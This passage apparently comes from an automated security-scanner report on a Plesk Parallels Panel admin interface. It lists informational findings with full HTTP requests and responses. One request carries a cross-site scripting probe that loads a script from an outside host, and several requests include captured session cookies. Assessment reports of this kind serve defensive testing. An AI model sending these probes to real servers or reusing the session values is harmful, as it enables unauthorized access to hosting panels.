Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.268. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/usr/local/psa/bin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /usr/local/psa/bin/

Request

GET /usr/local/psa/bin/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.269. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/usr/local/psa/bin/chrootsh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /usr/local/psa/bin/chrootsh

Request

GET /usr/local/psa/bin/chrootsh HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

13. Content type incorrectly stated  previous
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


13.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /?start_page=%22http://xss.cx/xss.js%22 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=subscriptions; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 16:00:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 16:00:43 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 24 Sep 2011 16:00:43 GMT
Server: sw-cp-server
Content-Length: 32

Non-relative URL in start_page.

13.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/chk.js.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/chk.js.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/chk.js.php HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Fri, 23 Sep 2011 18:24:07 GMT
Server: sw-cp-server
Content-Length: 8419

function chk_quotes(str)
{
   re = /(\'.*\")|(\".*\')/;
   return str.search(re) == -1;
}


function chk_pd_name(dir)
{
   re = /^[0-9a-zA-Z-_.\/]+$/;
   // forbid /../ and // and ^./ and ^../ and /./ and /
...[SNIP]...

13.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home/disable-featured-applications-promo  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/admin-home/disable-featured-applications-promo

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /smb/admin-home/disable-featured-applications-promo HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 12:14:23 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 12:14:23 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-Type: application/json
Date: Sat, 24 Sep 2011 12:14:23 GMT
Server: sw-cp-server
Content-Length: 2

[]

Report generated by Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6 at Sat Sep 24 17:03:36 CDT 2011.